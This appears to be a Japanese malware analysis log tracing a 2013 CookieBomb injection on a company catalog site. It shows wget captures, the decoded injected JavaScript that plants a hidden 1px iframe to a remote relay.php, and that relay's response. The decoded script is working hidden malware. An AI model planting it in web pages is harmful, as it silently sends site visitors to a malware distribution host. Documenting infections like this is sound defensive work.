// CookieBombインジェクションに感染されたサイトのアクセスログ...

--2013-07-15 16:57:36--  hxxp://www.antjapan.co.jp/catalog/
Resolving www.antjapan.co.jp... 211.10.17.56
Caching www.antjapan.co.jp => 211.10.17.56
Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
  :
GET /catalog/ HTTP/1.1
Host: www.antjapan.co.jp
HTTP request sent, awaiting response... 
  :
HTTP/1.1 200 OK
Date: Mon, 15 Jul 2013 07:55:25 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.4
Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=128
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=EUC-JP
200 OK
  :
Length: unspecified [text/html]
Saving to: ‘index.html’
2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]

// index.htmlにオOCJP-112のマルウェア感染コードを発見しました。

// decodeすると...

function zzzfff(){
  var h = document.createElement('iframe');
  h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
  h.style.position = 'absolute';
  h.style.border = '0';
  h.style.height = '1px';
  h.style.width = '1px';
  h.style.left = '1px';
  h.style.top = '1px';
  if (!document.getElementById('h')){
    document.write('<div id=\'h\'></div>');
    document.getElementById('h').appendChild(h);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}

// マルウェアのリンクをフォローすると....

--2013-07-15 17:06:16--  hxxp://www.verdaedevelopment.com/_js/relay.php
Resolving www.verdaedevelopment.com... 174.120.172.123
Caching www.verdaedevelopment.com => 174.120.172.123
Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
  :
GET /_js/relay.php HTTP/1.1
Referer: http://www.antjapan.co.jp/catalog/
Host: www.verdaedevelopment.com
HTTP request sent, awaiting response... 
  :
HTTP/1.1 200 OK
Date: Mon, 15 Jul 2013 08:04:06 GMT
Server: Apache
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
200 OK
Length: unspecified [text/html]
Saving to: ‘relay.php’
2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]

// 「relay.php」はマルウェア転送スクリプトで、条件/タイミングが合わないと「ok」などの回答が出る。
$ cat relay.php
ok